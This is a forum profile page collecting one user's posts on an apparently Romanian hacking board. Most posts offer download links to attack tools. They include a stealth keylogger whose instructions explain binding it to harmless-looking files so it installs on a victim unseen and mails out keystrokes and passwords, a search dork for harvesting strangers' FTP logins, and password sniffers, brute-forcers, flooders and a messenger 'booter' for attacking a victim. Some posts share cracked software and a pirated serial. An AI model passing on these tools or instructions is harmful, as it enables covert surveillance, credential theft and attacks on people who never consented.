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Everything posted by EthicalHacker
Felicitari pentru post Nemesiss ...
Vezi ca am postat si eu un topic despre Yahoo!Messenger Monitor Sniffer ...
This is basically a google dork. What basically happens is that if someone is logged in to his/her FTP account and checks a page which embeds a YouTube video through the FTP client, YouTube will register that as a hit from "<username>:<passord>@domain.tld", simply put. Which means that you are going to get his login information to his FTP server. Enjoy! site:youtube.com "clicks from ftp @"
Welcome ! Enjoy with your self ... ... Bafta
Acunetix este un scanner pentru vulnerabilitati ... Enjoy It ! Download: http://rapidshare.com/files/37547720/Acunetix.Web.Vulerability.Scanner.v4.0.Consultant.Edition.WinALL-TBE.rar
Download: http://rapidshare.com/files/12475077/elitek3yl0gg3r10.zip.html Features --------- 1)No Process Visible in any Task manager,Process explorer(2k,xp,9x) 2)Injects into Explorer.exe on startup and exiting the parent. 3)Firewall bypassing by injecting code into IE and sending mail 4)Invisible Startup, will not show in msconfig,autorun.exe (sysinternals) 5)Automatic Uninstall 6)Protucted Storage ,Cashed Passwords sender 7)No need ur own SMTP server(sending directly) to MX. 8)Remote Installer,Uninstaller 9)Built in Binder makes the keylogger same as the binded EXE(Icon,Version) 0)HTML formatted logs 11)Detect ICQ/MSN/AOL/Yahoo Chats. 12)Logging Window names,All keys typed in that window. 13)EXE Size is 12.7 KB Working ------- Settings First give ur email id,for reciving keylogs, then click GetMX button,It will find the MX of ur email domain then click test mail and chek ur getting a test mail. specify the Log size overflow(logs will send log size is over or each day) Then if u need Automatic uninstall keyloger from victim system on the date specify it if u need PAsswords of victims system select it, After completing the settings take setup Setup Installer,Uninstaller will make the keylog setup or uninstaller. Remote installer,uninstaller we can bind the keylogger with any type EXE or picture or doc files if we binded the keylogger with a setup or flash or any other program the resultent exe will look same as the binded exe,the same icon,version and if the victim opened the resultent exe the keylogger will install without knowing the victim picture or doc will open in the default viewer,binded exe will open same as that
Boucer.exe, a simple tool to run your own socks5 Proxy with user and password... Sockscap, a very usefull programm to get connected with Socks5 Proxy and use every Programm you want to use with socks5.. Have Fun! Download: http://rapidshare.com/files/36094791/Proxy.rar Password Proxy
Teamspeak Specials TS Admin Tools TS AIO TS Brute Forcer TS Channel Creator TS Client TS Flooder TS Scripts TS Spammer TS Usefull TS User Creator TS Videotutorials Filesize: 81mb. Enjoy It! http://rapidshare.com/files/36097197/Teamspeak_Tools.rar
MessenPass v1.10 este un "recuperator de parole" care iti redescopera parola pentru urmatoarele tipuri de Instant Messenger's: * MSN Messenger * Windows Messenger (In Windows XP) * Windows Live Messenger (In Windows XP And Vista) * Yahoo Messenger (Versions 5.x and 6.x) * Google Talk * ICQ Lite 4.x/5.x/2003 * AOL Instant Messenger (only older versions, the password in newer versions of AIM cannot be recovered) * AOL Instant Messenger/Netscape 7 * Trillian * Miranda * GAIM Enjoy It! Download: http://www.nirsoft.net/utils/mspass.zip
Program description The program is designated to recover passwords for following types of hashes: * MySQL * MySQL5 * DES (Unix) * MD4 * MD4 (Base64) * MD4 (HMAC) * MD5 * MD5 (Base64) * MD5 (HMAC) * MD5 (Unix) * MD5 (APR) * SHA-1 * SHA-1 (Base64) * SHA-1 (HMAC) * Domain Cached Credentials As well as for hashes used by various PHP-programs: * md5(md5($pass)) * md5(md5($pass).$salt) * md5(md5($salt).md5($pass)) * sha1($username.$pass) In the new version: - Program speed is appreciably increased for simultaneous work with large number of hashes (this is true for all hashes which do not use SALTs - MD4, MD5, etc.) - Ability to move selected users up and down in the list is added. - Ability to mark selected users for attack is added. - Bug fixed which could sometimes occur during brute-force attack causing the program to continue work after finishing forcing of selected passwords range (performing distributed attack). Below comparative table is given for speed of current and previous versions of the program (on Athlon 64 3000+) for MD5 algorithm (the brute-force attack). Number of hashes: 100 Speed on v2.3.0.0 (kp/s): 4794 Speed on v2.3.1.0 (kp/s): 4953 Number of hashes: 1000 Speed on v2.3.0.0 (kp/s): 1694 Speed on v2.3.1.0 (kp/s): 4531 Number of hashes: 5000 Speed on v2.3.0.0 (kp/s): 32 Speed on v2.3.1.0 (kp/s): 3222 Number of hashes: 10000 Speed on v2.3.0.0 (kp/s): 13 Speed on v2.3.1.0 (kp/s): 2698 Number of hashes: 20000 Speed on v2.3.0.0 (kp/s): 4.8 Speed on v2.3.1.0 (kp/s): 2043 Number of hashes: 40000 Speed on v2.3.0.0 (kp/s): 1.6 Speed on v2.3.1.0 (kp/s): 1373 Download: http://www.mediafire.com/?7mntrzmzm4l
Good little program to change ya tcp stack so you cant be footprinted easley so you can change your os linus bsd firewall and more Download: http://rapidshare.com/files/39288140/Security_Cloak.rar.html
Acest program, va protejeaza calculatorul de threats'uri, virusi, atacuri ale hackerilor, adware, spam si spyware. Enjoy It ! Download: http://www.afilehost.com/file/7610/kav7-0-0-120en-rar.html http://www.megaupload.com/?d=2AA90FWY http://rapidshare.com/files/37040480/kav7.0.0.120en.rar
IP Address Searcher v2.12 este un program foarte bun pentru scanarea retelelor LAN. Afiseaza toate IP-urile retelei si informatii despre MAC, etc. Enjoy It ! Download: http://rapidshare.com/files/40044761/IP.Address.Searcher.v2.12_inc_keygen.rar.html
Yahoo!Messenger Monitor Sniffer v3.0 este un program care va permite sa vedeti toate conversatiile (prin Y!M) dintr-o retea. Pentru a putea vedea conversatiile nu este nevoie ca nici un utilizator al retelei voastre LAN sa instaleze/deschida nici un executabil. Enjoy It! Download: http://rapidshare.com/files/33957234/YahooMonitor.v3.0.rar Pentru Yahoo Messenger v3.0 Name: tommy coleman Serial Number: AF87E94FD92228DA
The most powerful and effetive password sniffer. Ace Password Sniffer can listen on your LAN and enable network administrators or parents to capture passwords of any network user. Currently Ace Password Sniffer can monitor and capture passwords through FTP, POP3, HTTP, SMTP, Telnet, including some web mail password. Download: rapidshare.com/files/21376566/Ace_Password_Sniffer_V1.3.rar
Cyber-Pinoys Retune - Booter 20 Logins
EthicalHacker replied to EthicalHacker's topic in Programe hacking
Hah, asa retardat ma crezi ? Sa pun IP-ul meu ? Merci mult, bei ceva ? Si auzi escalation666, daca tot esti asa de cunoscator al regulilor, de ce ai avatar de 121x121 ? ... Ti se pare corect sa critici tu pe altii, si tot tu sa nu le respecti ? ... Vezi-ti de treaba de'acu inainte, ok ? -
Cyber-Pinoys Return este un booter, care permite logarea a 20 de boti constituiti din adrese de Y!M, si permite "Atacarea" cu toti cei 20 de boti, a unei victime ... Enjoy ... http://rapidshare.com/files/39855679/cyber-pinoys_return.zip
Merge ... Pacat ca e detectabil si ca nu se prea conecteaza botii !!!